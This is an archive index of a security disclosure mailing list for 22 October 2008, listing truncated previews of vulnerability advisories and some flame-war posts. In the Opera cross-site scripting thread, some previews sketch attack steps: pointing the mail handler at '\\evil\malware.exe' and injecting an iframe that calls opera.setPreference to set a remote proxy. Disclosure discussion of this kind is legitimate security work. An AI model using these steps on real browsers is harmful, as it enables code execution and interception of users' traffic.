Re: [Full-disclosure] DNS TXT Record Parsing Bug in LibSPF2

2008-10-22 Thread rholgstad
have you forwarded this email to nytimes, wall street journal, blackhat eu, jp, and usa, yet? We surely wouldn't want you to miss out on any press. Dan Kaminsky wrote: > Advisory: DNS TXT Record Parsing Bug in LibSPF2 > Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, > [EM

Re: [Full-disclosure] DNS TXT Record Parsing Bug in LibSPF2z

2008-10-22 Thread destiny
hello mr kamnski what size hotpants do yu wear? this is a privacy implecaton ! On Wed, 22 Oct 2008 06:14:51 +1100 Dan Kaminsky <[EMAIL PROTECTED]> wrote: >Advisory: DNS TXT Record Parsing Bug in LibSPF2 >Author: Dan Kaminsky, Director of Penetration Testing, IOActive >Inc, >[EMAIL PROTECTED

[Full-disclosure] [SECURITY] [DSA 1658-1] New dbus packages fix denial of service

2008-10-22 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1658-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst October 22, 2008

Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-22 Thread avivra
Hi, Just found a way to use Stefano's opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to "\\evil\malware.exe ", or to local commands (e.g. ftp.exe which can be used to download malicious binaries fr

[Full-disclosure] Secunia Research: HP OpenView Products Shared Trace Service Denial of Service

2008-10-22 Thread Secunia Research
== Secunia Research 22/10/2008 - HP OpenView Products Shared Trace Service Denial of Service - == Table of Contents Affected Software

[Full-disclosure] Secunia Research: Trend Micro OfficeScan CGI Parsing Buffer Overflows

2008-10-22 Thread Secunia Research
== Secunia Research 22/10/2008 - Trend Micro OfficeScan CGI Parsing Buffer Overflows - == Table of Contents Affected Software...

[Full-disclosure] Secunia Research: GNU Enscript "setfilename" Special Escape Buffer Overflow

2008-10-22 Thread Secunia Research
== Secunia Research 22/10/2008 - GNU Enscript "setfilename" Special Escape Buffer Overflow - == Table of Contents Affected Software..

[Full-disclosure] FGA-2008-23:EMC NetWorker Denial of Service Vulnerability

2008-10-22 Thread [EMAIL PROTECTED]
FGA-2008-23:EMC NetWorker Denial of Service Vulnerability 2008.October.21   Fortinet's FortiGuard Global Security Research Team Discovers Vulnerability in EMC NetWorker   Summary:  A resource exhaustion vulnerability exists throughout multiple EMC products through an exploited RPC i

[Full-disclosure] DNS TXT Record Parsing Bug in LibSPF2

2008-10-22 Thread Dan Kaminsky
Advisory: DNS TXT Record Parsing Bug in LibSPF2 Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, [EMAIL PROTECTED] (PGP Key In Appendix) Abstract: A relatively common bug parsing TXT records delivered over DNS, dating at least back to 2002 in Sendmail 8.2.0 and almost certai

[Full-disclosure] Insomnia : ISVA-081020.1 - Altiris Deployment Server Agent - Privilege Escalation

2008-10-22 Thread Brett Moore
__ Insomnia Security Vulnerability Advisory: ISVA-081020.1 ___ Name: Altiris Deployment Server Agent - Privilege Escalation Released: 20 October 2008 Vendor Link

[Full-disclosure] Last Call for DeepSec IDSC 2008 in Vienna

2008-10-22 Thread DeepSec Conference Vienna
The DeepSec In Depth Security Conference is happy to announce the planned schedule for this year's event from November 11th to 14th in Vienna, Austria. The schedule (which can be found at https://deepsec.net/schedule) covers a range of topics including botnet analysis, web application security, ma

[Full-disclosure] [TKADV2008-010] VLC media player TiVo ty Processing Stack Overflow Vulnerability

2008-10-22 Thread Tobias Klein
Please find attached a detailed advisory of the vulnerability. Alternatively, the advisory can also be found at: http://www.trapkit.de/advisories/TKADV2008-010.txt -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Advisory: VLC media player TiVo ty Processing Stack Overflow

[Full-disclosure] Fwd: ureleet

2008-10-22 Thread waveroad waveroad
-- Forwarded message -- From: waveroad waveroad <[EMAIL PROTECTED]> Date: 2008/10/22 Subject: Re: [Full-disclosure] ureleet To: Sigma & Omicron & Beta <[EMAIL PROTECTED]> Urleet & n3td3v why dont you fix your problems privatly ? There' enought crap in this FD list, and there's no

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: Stefano Di Paola [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 5:41 a.m. To: Roberto Suggi Cc: kuza55; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Hi guys >I'm not a real Opera expert

Re: [Full-disclosure] ureleet

2008-10-22 Thread Sigma & Omicron & Beta
Please ignore him. His worst nightmare is that we setup a filter that will delete any email containing n3td3v. we dont care about his licence shit or his opinions. So i dont think we will lose any information that matter. The poor guy is going to grow up in 1 or 2 years and he will finally leave th

[Full-disclosure] SECOBJADV-2008-05: Symantec Veritas Storage Foundation Arbitrary File Read Vulnerability

2008-10-22 Thread Security Objectives Corporation
== = Security Objectives Advisory (SECOBJADV-2008-05) = == Veritas Storage Foundation Arbitrary File Read Vulnerability http://www.security-obj

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Stefano Di Paola
Hi guys I'm not a real Opera expert, but since the scheme is opera: you could change the configuration on the fly, for example to set a remote proxy 1. add in historysearch an iframe with src='opera:config' 2. add a script into the iframe which execute: opera.setPreference("Proxy","HTTP Server","a

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA

2008-10-22 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA Advisory ID: cisco-sa-20081022-asa http://www.cisco.com/warp/public/707/cisco-sa-20081022-asa.shtml Revision 1.0 For Public Release 2008 October 22 1600 UTC (GMT

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: kuza55 [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 1:25 a.m. To: Roberto Suggi Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Is there any potential for code execution here similar

Re: [Full-disclosure] ureleet

2008-10-22 Thread n3td3v
Why would n3td3v ban n3td3v from n3td3v? And why would the banning of n3td3v by n3td3v from n3td3v make n3td3v mad? > Date: Wed, 22 Oct 2008 04:29:13 +0100 > From: [EMAIL PROTECTED] > To: full-disclosure@lists.grok.org.uk > Subject: [Full-disclosure] ureleet > > you're just trying to ruin the r

Re: [Full-disclosure] marcus sachs

2008-10-22 Thread n3td3v
n3td3v has no idea why n3td3v is posting highly off topic video links to FD. Perhaps n3td3v needs to be trout slapped. > Date: Wed, 22 Oct 2008 02:00:16 +0100 > From: [EMAIL PROTECTED] > To: full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] marcus sachs > > he should come ont

[Full-disclosure] Advisory for Oracle CPU October 2008 - APEX Flows excessive privileges

2008-10-22 Thread Pete Finnigan
Advisory for Oracle CPU October 2008 - APEX FLOWS excessive privileges == See http://www.petefinnigan.com/Advisory_CPU_Oct_2008.htm for details Description --- Oracle Appication Express (APEX) is a rapid development tool

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread kuza55
Is there any potential for code execution here similar to XSS bugs in Firefox's chrome:// context or in IE's Local Zone? Also, you have a PoC which extracts document.cookie; which cookie does this acquire? From my understanding of this advisory the xss is rendered in opera:historysearch rather tha

[Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
== = = Opera Stored Cross Site Scripting Vulnerability = = Vendor Website: = http://www.opera.com = = Affected Version: = -- All desktop versions = = Public disclosure on 22nd October 2008 = ==